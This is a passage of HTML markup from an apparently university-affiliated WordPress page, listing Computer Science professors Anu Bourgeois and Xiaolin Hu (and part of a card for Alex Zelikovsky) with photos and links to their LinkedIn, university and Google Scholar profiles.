</div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-bourgeois-e1697143389924.jpeg\" class=\"wp-image-1675 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/cropped-cropped-hu_new-1-e1697143455517.jpg\" class=\"wp-image-1677 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 